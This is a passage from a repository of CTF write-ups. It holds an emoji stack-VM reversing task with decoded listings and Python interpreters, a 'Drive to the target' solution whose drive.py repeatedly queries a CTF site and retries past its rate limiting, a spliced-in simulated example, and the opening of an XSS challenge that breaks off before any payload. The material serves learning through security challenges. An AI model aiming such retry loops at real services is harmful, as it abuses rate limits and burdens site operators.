142 | 😲 🏀 💰🎌🏁🚩🔶💠 😐
143 | 🤡 📥 🥈 🏀 💰🏁💠🔶🚩🎌
144 |
--------------------------------------------------------------------------------
/07-reversing-emoji/translated:
--------------------------------------------------------------------------------
1 | push 0
2 | push 17488
3 | push 16758
4 | push 16599
5 | push 16285
6 | push 16094
7 | push 15505
8 | push 15417
9 | push 14832
10 | push 14450
11 | push 13893
12 | push 13926
13 | push 13437
14 | push 12833
15 | push 12741
16 | push 12533
17 | push 11504
18 | push 11342
19 | push 10503
20 | push 10550
21 | push 10319
22 | push 975
23 | push 1007
24 | push 892
25 | push 893
26 | push 660
27 | push 743
28 | push 267
29 | push 344
30 | push 264
31 | push 339
32 | push 208
33 | push 216
34 | push 242
35 | push 172
36 | push 74
37 | push 49
38 | push 119
39 | push 113
40 | push 119
41 | push 106
42 | pop acc1
43 | push 1
44 | push 106
45 | push 389
46 | push 1
47 | jump_to
48 | xor
49 | print_top
50 | push 1
51 | add
52 | pop acc2
53 | if_not_zero
54 | jump_to
55 | push 98426
56 | push 97850
57 | push 97604
58 | push 97280
59 | push 96815
60 | push 96443
61 | push 96354
62 | push 95934
63 | push 94865
64 | push 94952
65 | push 94669
66 | push 94440
67 | push 93969
68 | push 93766
69 | pop acc1
70 | push 99
71 | push 93766
72 | push 568
73 | push 99
74 | jump_to
75 | xor
76 | print_top
77 | push 1
78 | add
79 | pop acc2
80 | if_not_zero
81 | jump_to
82 | push 101141058
83 | push 101060206
84 | push 101030055
85 | push 100998966
86 | push 100887990
87 | push 100767085
88 | push 100707036
89 | push 100656111
90 | push 100404094
91 | push 100160922
92 | push 100131019
93 | push 100111100
94 | push 100059926
95 | push 100049982
96 | push 100030045
97 | push 9989997
98 | push 9981858
99 | push 9980815
100 | push 9978842
101 | push 9965794
102 | push 9957564
103 | push 9938304
104 | push 9935427
105 | push 9932289
106 | push 9931494
107 | push 9927388
108 | push 9926376
109 | push 9923213
110 | push 9921394
111 | push 9919154
112 | push 9918082
113 | push 9916239
114 | pop acc1
115 | push 765
116 | push 9916239
117 | push 1023
118 | push 765
119 | jump_to
120 | xor
121 | print_top
122 | push 1
123 | add
124 | pop acc2
125 | if_not_zero
126 | jump_to
127 | exit
128 | push 2
129 | jump_to
130 | if_zero
131 | pop_out
132 | jump_to
133 | pop_out
134 | jump_to
135 | if_zero
136 | pop_out
137 | jump_to
138 | pop_out
139 | pop acc1
140 | push 1
141 | sub
142 | if_zero
143 | pop_out
144 | pop acc2
145 | push 2
146 | push 1
147 | jump_top
148 | push 2
149 | push 1
150 | add
151 | jump_to
152 | clone
153 | push 2
154 | sub
155 | if_zero
156 | pop_out
157 | push 1
158 | jump_to
159 | pop_out
160 | clone
161 | push 1
162 | modulo
163 | if_zero
164 | jump_to
165 | pop_out
166 | clone
167 | push 1
168 | push 1
169 | add
170 | clone
171 | pop acc1
172 | jump_to
173 | clone
174 | clone
175 | push 0
176 | push 10
177 | multiply
178 | pop acc2
179 | push 10
180 | modulo
181 | push 10
182 | add
183 | pop acc2
184 | pop acc1
185 | clone
186 | push 10
187 | sub
188 | if_zero
189 | pop_out
190 | push 1
191 | jump_to
192 | pop_out
193 | push 10
194 | push 10
195 | divide
196 | if_zero
197 | jump_to
198 | clone
199 | push 1
200 | jump_to
201 |
--------------------------------------------------------------------------------
/07-reversing-emoji/vm.modified.py:
--------------------------------------------------------------------------------
1 | import sys
2 |
3 | # Implements a simple stack-based VM
4 | class VM:
5 |
6 |     def __init__(self, rom):
7 |         self.rom = rom
8 |         self.accumulator1 = 0
9 |         self.accumulator2 = 0
10 |         self.instruction_pointer = 1
11 |         self.stack = []
12 |
13 |     def step(self):
14 |         cur_ins = self.rom[self.instruction_pointer]
15 |         self.instruction_pointer += 1
16 |
17 |         fn = VM.OPERATIONS.get(cur_ins, None)
18 |
19 |         if cur_ins[0] == '🖋':
20 |             return
21 |         if fn is None:
22 |             raise RuntimeError("Unknown instruction '{}' at {}".format(
23 |                 repr(cur_ins), self.instruction_pointer - 1))
24 |         else:
25 |             fn(self)
26 |
27 |     def add(self):
28 |         self.stack.append(self.stack.pop() + self.stack.pop())
29 |
30 |     def sub(self):
31 |         a = self.stack.pop()
32 |         b = self.stack.pop()
33 |         self.stack.append(b - a)
34 |
35 |     def if_zero(self):
36 |         if self.stack[-1] == 0:
37 |             while self.rom[self.instruction_pointer] != '😐':
38 |                 if self.rom[self.instruction_pointer] in ['🏀', '⛰']:
39 |                     break
40 |                 self.step()
41 |         else:
42 |             self.find_first_endif()
43 |             self.instruction_pointer += 1
44 |
45 |     def if_not_zero(self):
46 |         if self.stack[-1] != 0:
47 |             while self.rom[self.instruction_pointer] != '😐':
48 |                 if self.rom[self.instruction_pointer] in ['🏀', '⛰']:
49 |                     break
50 |                 self.step()
51 |         else:
52 |             self.find_first_endif()
53 |             self.instruction_pointer += 1
54 |
55 |     def find_first_endif(self):
56 |         while self.rom[self.instruction_pointer] != '😐':
57 |             self.instruction_pointer += 1
58 |
59 |     def jump_to(self):
60 |         marker = self.rom[self.instruction_pointer]
61 |         if marker[0] != '💰':
62 |             print('Incorrect symbol : ' + marker[0])
63 |             raise SystemExit()
64 |         marker = '🖋' + marker[1:]
65 |         self.instruction_pointer = self.rom.index(marker) + 1
66 |
67 |     def jump_top(self):
68 |         self.instruction_pointer = self.stack.pop()
69 |
70 |     def exit(self):
71 |         print('\nDone.')
72 |         raise SystemExit()
73 |
74 |     def print_top(self):
75 |         sys.stdout.write(chr(self.stack.pop()))
76 |         sys.stdout.flush()
77 |
78 |     def push(self):
79 |         if self.rom[self.instruction_pointer] == '🥇':
80 |             self.stack.append(self.accumulator1)
81 |         elif self.rom[self.instruction_pointer] == '🥈':
82 |             self.stack.append(self.accumulator2)
83 |         else:
84 |             raise RuntimeError('Unknown instruction {} at position {}'.format(
85 |                 self.rom[self.instruction_pointer], str(self.instruction_pointer)))
86 |         self.instruction_pointer += 1
87 |
88 |     def pop(self):
89 |         if self.rom[self.instruction_pointer] == '🥇':
90 |             self.accumulator1 = self.stack.pop()
91 |         elif self.rom[self.instruction_pointer] == '🥈':
92 |             self.accumulator2 = self.stack.pop()
93 |         else:
94 |             raise RuntimeError('Unknown instruction {} at position {}'.format(
95 |                 self.rom[self.instruction_pointer], str(self.instruction_pointer)))
96 |         self.instruction_pointer += 1
97 |
98 |     def pop_out(self):
99 |         self.stack.pop()
100 |
101 |     def load(self):
102 |         num = 0
103 |
104 |         if self.rom[self.instruction_pointer] == '🥇':
105 |             acc = 1
106 |         elif self.rom[self.instruction_pointer] == '🥈':
107 |             acc = 2
108 |         else:
109 |             raise RuntimeError('Unknown instruction {} at position {}'.format(
110 |                 self.rom[self.instruction_pointer], str(self.instruction_pointer)))
111 |         self.instruction_pointer += 1
112 |
113 |         while self.rom[self.instruction_pointer] != '✋':
114 |             num = num * 10 + (ord(self.rom[self.instruction_pointer][0]) - ord('0'))
115 |             self.instruction_pointer += 1
116 |
117 |         if acc == 1:
118 |             self.accumulator1 = num
119 |         else:
120 |             self.accumulator2 = num
121 |
122 |         self.instruction_pointer += 1
123 |
124 |     def clone(self):
125 |         self.stack.append(self.stack[-1])
126 |
127 |     def multiply(self):
128 |         a = self.stack.pop()
129 |         b = self.stack.pop()
130 |         self.stack.append(b * a)
131 |
132 |     def divide(self):
133 |         a = self.stack.pop()
134 |         b = self.stack.pop()
135 |         self.stack.append(b // a)
136 |
137 |     def modulo(self):
138 |         a = self.stack.pop()
139 |         b = self.stack.pop()
140 |         self.stack.append(b % a)
141 |
142 |     def xor(self):
143 |         a = self.stack.pop()
144 |         b = self.stack.pop()
145 |         print("{} ^ {}\n".format(b, a))
146 |         self.stack.append(b ^ a)
147 |
148 |     OPERATIONS = {
149 |         '🍡': add,
150 |         '🤡': clone,
151 |         '📐': divide,
152 |         '😲': if_zero,
153 |         '😄': if_not_zero,
154 |         '🏀': jump_to,
155 |         '🚛': load,
156 |         '📬': modulo,
157 |         '⭐': multiply,
158 |         '🍿': pop,
159 |         '📤': pop_out,
160 |         '🎤': print_top,
161 |         '📥': push,
162 |         '🔪': sub,
163 |         '🌓': xor,
164 |         '⛰': jump_top,
165 |         '⌛': exit
166 |     }
167 |
168 |
169 | if __name__ == '__main__':
170 |     if len(sys.argv) != 2:
171 |         print('Missing program')
172 |         raise SystemExit()
173 |
174 |     with open(sys.argv[1], 'r') as f:
175 |         print('Running ....')
176 |         all_ins = ['']
177 |         all_ins.extend(f.read().split())
178 |         vm = VM(all_ins)
179 |
180 |         while 1:
181 |             vm.step()
182 |
--------------------------------------------------------------------------------
/07-reversing-emoji/vm.py:
--------------------------------------------------------------------------------
1 | import sys
2 |
3 | # Implements a simple stack-based VM
4 | class VM:
5 |
6 |     def __init__(self, rom):
7 |         self.rom = rom
8 |         self.accumulator1 = 0
9 |         self.accumulator2 = 0
10 |         self.instruction_pointer = 1
11 |         self.stack = []
12 |
13 |     def step(self):
14 |         cur_ins = self.rom[self.instruction_pointer]
15 |         self.instruction_pointer += 1
16 |
17 |         fn = VM.OPERATIONS.get(cur_ins, None)
18 |
19 |         if cur_ins[0] == '🖋':
20 |             return
21 |         if fn is None:
22 |             raise RuntimeError("Unknown instruction '{}' at {}".format(
23 |                 repr(cur_ins), self.instruction_pointer - 1))
24 |         else:
25 |             fn(self)
26 |
27 |     def add(self):
28 |         self.stack.append(self.stack.pop() + self.stack.pop())
29 |
30 |     def sub(self):
31 |         a = self.stack.pop()
32 |         b = self.stack.pop()
33 |         self.stack.append(b - a)
34 |
35 |     def if_zero(self):
36 |         if self.stack[-1] == 0:
37 |             while self.rom[self.instruction_pointer] != '😐':
38 |                 if self.rom[self.instruction_pointer] in ['🏀', '⛰']:
39 |                     break
40 |                 self.step()
41 |         else:
42 |             self.find_first_endif()
43 |             self.instruction_pointer += 1
44 |
45 |     def if_not_zero(self):
46 |         if self.stack[-1] != 0:
47 |             while self.rom[self.instruction_pointer] != '😐':
48 |                 if self.rom[self.instruction_pointer] in ['🏀', '⛰']:
49 |                     break
50 |                 self.step()
51 |         else:
52 |             self.find_first_endif()
53 |             self.instruction_pointer += 1
54 |
55 |     def find_first_endif(self):
56 |         while self.rom[self.instruction_pointer] != '😐':
57 |             self.instruction_pointer += 1
58 |
59 |     def jump_to(self):
60 |         marker = self.rom[self.instruction_pointer]
61 |         if marker[0] != '💰':
62 |             print('Incorrect symbol : ' + marker[0])
63 |             raise SystemExit()
64 |         marker = '🖋' + marker[1:]
65 |         self.instruction_pointer = self.rom.index(marker) + 1
66 |
67 |     def jump_top(self):
68 |         self.instruction_pointer = self.stack.pop()
69 |
70 |     def exit(self):
71 |         print('\nDone.')
72 |         raise SystemExit()
73 |
74 |     def print_top(self):
75 |         sys.stdout.write(chr(self.stack.pop()))
76 |         sys.stdout.flush()
77 |
78 |     def push(self):
79 |         if self.rom[self.instruction_pointer] == '🥇':
80 |             self.stack.append(self.accumulator1)
81 |         elif self.rom[self.instruction_pointer] == '🥈':
82 |             self.stack.append(self.accumulator2)
83 |         else:
84 |             raise RuntimeError('Unknown instruction {} at position {}'.format(
85 |                 self.rom[self.instruction_pointer], str(self.instruction_pointer)))
86 |         self.instruction_pointer += 1
87 |
88 |     def pop(self):
89 |         if self.rom[self.instruction_pointer] == '🥇':
90 |             self.accumulator1 = self.stack.pop()
91 |         elif self.rom[self.instruction_pointer] == '🥈':
92 |             self.accumulator2 = self.stack.pop()
93 |         else:
94 |             raise RuntimeError('Unknown instruction {} at position {}'.format(
95 |                 self.rom[self.instruction_pointer], str(self.instruction_pointer)))
96 |         self.instruction_pointer += 1
97 |
98 |     def pop_out(self):
99 |         self.stack.pop()
100 |
101 |     def load(self):
102 |         num = 0
103 |
104 |         if self.rom[self.instruction_pointer] == '🥇':
105 |             acc = 1
106 |         elif self.rom[self.instruction_pointer] == '🥈':
107 |             acc = 2
108 |         else:
109 |             raise RuntimeError('Unknown instruction {} at position {}'.format(
110 |                 self.rom[self.instruction_pointer], str(self.instruction_pointer)))
111 |         self.instruction_pointer += 1
112 |
113 |         while self.rom[self.instruction_pointer] != '✋':
114 |             num = num * 10 + (ord(self.rom[self.instruction_pointer][0]) - ord('0'))
115 |             self.instruction_pointer += 1
116 |
117 |         if acc == 1:
118 |             self.accumulator1 = num
119 |         else:
120 |             self.accumulator2 = num
121 |
122 |         self.instruction_pointer += 1
123 |
124 |     def clone(self):
125 |         self.stack.append(self.stack[-1])
126 |
127 |     def multiply(self):
128 |         a = self.stack.pop()
129 |         b = self.stack.pop()
130 |         self.stack.append(b * a)
131 |
132 |     def divide(self):
133 |         a = self.stack.pop()
134 |         b = self.stack.pop()
135 |         self.stack.append(b // a)
136 |
137 |     def modulo(self):
138 |         a = self.stack.pop()
139 |         b = self.stack.pop()
140 |         self.stack.append(b % a)
141 |
142 |     def xor(self):
143 |         a = self.stack.pop()
144 |         b = self.stack.pop()
145 |         self.stack.append(b ^ a)
146 |
147 |     OPERATIONS = {
148 |         '🍡': add,
149 |         '🤡': clone,
150 |         '📐': divide,
151 |         '😲': if_zero,
152 |         '😄': if_not_zero,
153 |         '🏀': jump_to,
154 |         '🚛': load,
155 |         '📬': modulo,
156 |         '⭐': multiply,
157 |         '🍿': pop,
158 |         '📤': pop_out,
159 |         '🎤': print_top,
160 |         '📥': push,
161 |         '🔪': sub,
162 |         '🌓': xor,
163 |         '⛰': jump_top,
164 |         '⌛': exit
165 |     }
166 |
167 |
168 | if __name__ == '__main__':
169 |     if len(sys.argv) != 2:
170 |         print('Missing program')
171 |         raise SystemExit()
172 |
173 |     with open(sys.argv[1], 'r') as f:
174 |         print('Running ....')
175 |         all_ins = ['']
176 |         all_ins.extend(f.read().split())
177 |         vm = VM(all_ins)
178 |
179 |         while 1:
180 |             vm.step()
181 |
--------------------------------------------------------------------------------
/08-misc-drive-to-target/README.md:
--------------------------------------------------------------------------------
1 | # Description
2 | ## Drive to the target
3 | Label: coding
4 |
5 | Excellent work! With your fine sleuthing skills, you managed to find a picture of the handsome creature with its pet biped. At last friends and companionship may be near!
6 |
7 | Like all inhabitants of this world, you spend an inordinate amount of time on the site, stalking and comparing your life to that of others. The first thought that springs to your mind is "Why haven't I ever been to Mauritius on holiday?" followed swiftly by "What is a Mauritius anyway?" But after a while and with language successfully deciphered, you've made contact with the lifeform in the picture, you have a "date"? You're given the address of where to meet your potential interest. "1 Banana way, beware of the glass." An odd address, especially that last part. So how do you get there? You land your ship and begin to search.
8 |
9 | # Solution
10 | This task is a link to the site `https://drivetothetarget.web.ctfcompetition.com`. The site contains two inputs for latitude and longitude. Submitting values tells you your speed and whether you are getting closer or further away. It seems that the goal is to find the correct location, but you can only move a bit at a time. Playing with the numbers, decrementing lat and lon gives us the message that we are getting closer. Some other important facts: when the message says that you traveled too fast, if you retry the same value, eventually it will work. Next, a new token is given in a hidden input field. With these facts, we can write a script that continuously decrements the lat and lon, and retries if it fails. It also appears that the token identifies your location, which is how the site calculates the distance you can travel.
11 |
12 | The script `drive.py` continuously decrements `lon` until the message says that we are moving away. Then it switches to decrementing `lat`. Something important that I didn't add is a check for the text `CTF` in case we find it, as I was mostly monitoring it. I found that the default increment of `0.0001` worked well. This is marked as a 'coding' task but I'm not sure if just spamming a ton of calls is the right way to approach this. Maybe there is a way to calculate the token. It would also be better optimized if both lat and lon were decremented but I didn't know if that would work in case you had to decrement one more than the other.
13 |
14 | At `{'lat': '51.4921', 'lon': '-0.1929', 'token': 'gAAAAABdEwWoQWGTXd5P1nB6paz9PWM-LbxNr_bfmaAC5qVJZXwanyHyGPUHqFZIj9hj3I3Q1mqG3jpWEIgLO3z7C_tu7MsEDb33TL3FFyUtM0gxFmFMc-Xs6K8h57Wu-yl5IB-ZNJgY'}`, the script got stuck in a loop printing out `If you want to meet your friends, you should move.` because I forgot the exit condition. So at that point I just manually adjusted the values. And the final values are
15 | `{'lat': '51.4921', 'lon': '-0.1929'}` with the flag `CTF{Who_is_Tardis_Ormandy}`. In all, it took quite a long time to run.
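
The loop described above with the two exit conditions the write-up says were missing (a stop on `CTF`, and a stop instead of a spin on the "you should move" message), as an added example that is not the repository's `drive.py`. `FakeSite` is a constructed offline stand-in for the challenge server; its speed-limit rule, full message texts and flag value are assumptions.

```python
# Added example: FakeSite is a constructed offline stand-in, not the real server.
# Positions are integers in units of 0.0001 degree to avoid float drift.


def fmt(units):
    """Render a position as the 4-decimal string drive.py sends."""
    return "{0:.4f}".format(units / 10000)


class FakeSite:
    """Assumed behaviour: a server-side position (what the token stands for),
    a speed limit that rejects the request right after a move, and
    constructed message texts that keep the prefixes drive.py matches on."""

    def __init__(self, start, target, flag="CTF{constructed_example_flag}"):
        self.pos, self.target, self.flag = start, target, flag
        self.cooldown = 0

    def _dist2(self, p):
        return (p[0] - self.target[0]) ** 2 + (p[1] - self.target[1]) ** 2

    def get(self, lat, lon):
        new = (round(float(lat) * 10000), round(float(lon) * 10000))
        if new == self.pos:
            return "If you want to meet your friends, you should move."
        if self.cooldown > 0:
            self.cooldown -= 1
            return "You tried to travel too fast."
        closer = self._dist2(new) < self._dist2(self.pos)
        self.pos, self.cooldown = new, 1
        if new == self.target:
            return self.flag
        return "You are getting closer…" if closer else "You are getting away…"


def drive(site, start, max_retries=5, max_requests=10000):
    """Decrement lon, then lat, as drive.py does. Returns (outcome, pos, requests)."""
    pos, axis, step = start, 1, -1          # axis 1 = lon, axis 0 = lat
    undoing, axes_done, retries, requests = False, 0, 0, 0
    while requests < max_requests:
        nxt = (pos[0] + step, pos[1]) if axis == 0 else (pos[0], pos[1] + step)
        msg = site.get(fmt(nxt[0]), fmt(nxt[1]))
        requests += 1
        if "CTF" in msg:                    # flag check the write-up says was missing
            return msg, nxt, requests
        if msg.startswith("You tried to travel"):
            retries += 1                    # retry the same values, but not forever
            if retries > max_retries:
                return "rate-limited", pos, requests
            continue
        retries = 0
        if msg.startswith("If you want to meet your friends"):
            return "stuck", pos, requests   # exit instead of spinning on this message
        pos = nxt                           # the site accepted the move
        if undoing:                         # overshoot undone: switch to the other axis
            undoing, step, axis, axes_done = False, -1, 1 - axis, axes_done + 1
            if axes_done == 2:
                return "no-flag", pos, requests
        elif msg.endswith("getting away…"):
            undoing, step = True, 1         # step back onto the last improving value
    return "request-budget-exhausted", pos, requests


if __name__ == "__main__":
    # Start position from drive.py, final coordinates from the write-up.
    start, target = (515710, -1925), (514921, -1929)
    outcome, pos, used = drive(FakeSite(start, target), start)
    print(outcome, fmt(pos[0]), fmt(pos[1]), used)
```

Like the original script, this only ever decrements, so a target that lies in the increasing direction on either axis ends in `no-flag` rather than a hang.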
--------------------------------------------------------------------------------
/08-misc-drive-to-target/drive.py:
--------------------------------------------------------------------------------
1 | # requires requests and requests-html
2 |
3 | from requests_html import HTMLSession
4 | from urllib.parse import urlparse, parse_qs
5 | import time
6 |
7 | lat = 51.5710
8 | lon = -0.1925
9 | token = 'gAAAAABdEwKRoX1YphdiX0kwxKSsY6CmxjNt-R5hkwf4-Ohktb7oyZJRkrX-LK5j12wuj_jgSNjY9wG53zrifwIe1OMk23uTX7LJaYzB7gWRPFUBXYqePYLekg4Z2RgMt3HE0ehzP50Y'
10 | url = 'https://drivetothetarget.web.ctfcompetition.com'
11 | inc = 0.0001
12 | is_lat = False
13 |
14 | session = HTMLSession()
15 | while True:
16 |     qlat = lat - inc if is_lat else lat
17 |     qlon = lon - inc if not is_lat else lon
18 |     query = {'lat': "{0:.4f}".format(qlat), 'lon': "{0:.4f}".format(qlon), 'token': token}
19 |     r = session.get(url, params=query)
20 |     response_url = urlparse(r.url)
21 |     response_query = parse_qs(response_url.query)
22 |
23 |     token = r.html.find('input')[2].attrs['value']
24 |
25 |     print(query)
26 |
27 |     try:
28 |         response_text = r.html.find('p')[1].text
29 |         print(response_text)
30 |
31 |         if response_text.startswith('You tried to travel') or response_text.startswith('Woa, were about to move'):
32 |             # retry last values
33 |             pass
34 |         elif response_text.endswith('You are getting closer…'):
35 |             # update with new values
36 |             lat = float(response_query['lat'][0])
37 |             lon = float(response_query['lon'][0])
38 |         elif response_text.endswith('You are getting away…'):
39 |             if is_lat:
40 |                 print("done, {}".format(query))
41 |                 exit()
42 |             is_lat = True
43 |     except Exception:  # a bare except would also swallow the SystemExit raised by exit()
44 |         print('Error. {}'.format(r.html.text))
45 |         print("url: {}".format(r.url))
46 |
47 | # states = [0, 1]
48 | # state = 0
49 | # failcount = 0
50 |
51 | # last_lat = lat
52 | # last_lon = lon
53 |
54 | # session = HTMLSession()
55 | # while True:
56 | # query = {'lat': str(lat), 'lon': str(lon), 'token': token}
57 | # print({'lat': lat, 'lon': lon})
58 | # r = session.get(url, params=query)
59 | # response_url = urlparse(r.url)
60 | # response_query = parse_qs(response_url.query)
61 | # token = response_query['token'][0]
62 |
63 | # try:
64 | # response_text = r.html.find('p')[1].text
65 | # print(response_text)
66 | # print(token)
67 |
68 | # if response_text.startswith('You tried to travel'):
69 | # failcount += 1
70 | # if failcount > 2:
71 | # failcount = 0
72 | # state = (state + 1) % len(states)
73 |
74 | # lat = last_lat
75 | # lon = last_lon
76 | # else:
77 | # failcount = 0
78 | # last_lat = lat
79 | # last_lon = lon
80 |
81 | # if states[state] == 0:
82 | # lon -= inc
83 | # else:
84 | # lat -= inc
85 | # except:
86 | # print('Error. {}'.format(r.html.text))
87 | # print("url: {}".format(r.url))
88 |
89 | # time.sleep(1)
90 |
91 |
92 | # states = [2]
93 | # state = 0
94 | # inc = 0.0005
95 |
96 | # last_lat = lat
97 | # last_lon = lon
98 | # failcount = 0
99 |
100 | # while True:
101 | # query = {'lat': str(lat), 'lon': str(lon), 'token': token}
102 | # print({'lat': lat, 'lon': lon})
103 | # r = session.get(url, params=query)
104 | # response_url = urlparse(r.url)
105 | # response_query = parse_qs(response_url.query)
106 | # token = response_query['token'][0]
107 |
108 | # try:
109 | # response_text = r.html.find('p')[1].text
110 | # print(response_text)
111 | # print(token)
112 |
113 | # if response_text.startswith('You tried to travel'):
114 | # failcount += 1
115 | # if (failcount > 2):
116 | # failcount = 0
117 | # # inc /= 10
118 |
119 | # state = (state + 1) % len(states)
120 | # lat = last_lat
121 | # lon = last_lon
122 | # else:
123 | # failcount = 0
124 | # inc = 0.001
125 | # last_lat = lat
126 | # last_lon = lon
127 |
128 | # if states[state] == 1:
129 | # lat -= inc
130 | # elif states[state] == 2:
131 | # lon -= inc
132 | # elif states[state] == 0:
133 | # lat -= inc
134 | # lon -= inc
135 | # except:
136 | # print('Error. {}'.format(r.html.text))
137 | # print("url: {}".format(r.url))
138 |
139 | # input()
--------------------------------------------------------------------------------
/09-web-cwo-xss/README.md:
--------------------------------------------------------------------------------
1 | # Description
2 | ## Cookie World Order
3 | Label: web
4 |
5 | Good job! You found a further credential that looks like a VPN referred to as the cWo. The organization appears very clandestine and mysterious and reminds you of the secret ruling class of hard shelled turtle-like creatures of Xenon. Funny they trust their security to a contractor outside their systems, especially one with such bad habits. Upon further snooping you find a video feed of those "Cauliflowers" which look to be the dominant lifeforms and members of the cWo. Go forth and attain greater access to reach this creature!
6 |
7 | # Solution
8 | This task gives us a link [https://cwo-xss.web.ctfcompetition.com/](https://cwo-xss.web.ctfcompetition.com/). The website contains a video and a chat window on the right side. It appears that we are chatting with an admin and so it probably requires another xss. However, entering a tag like `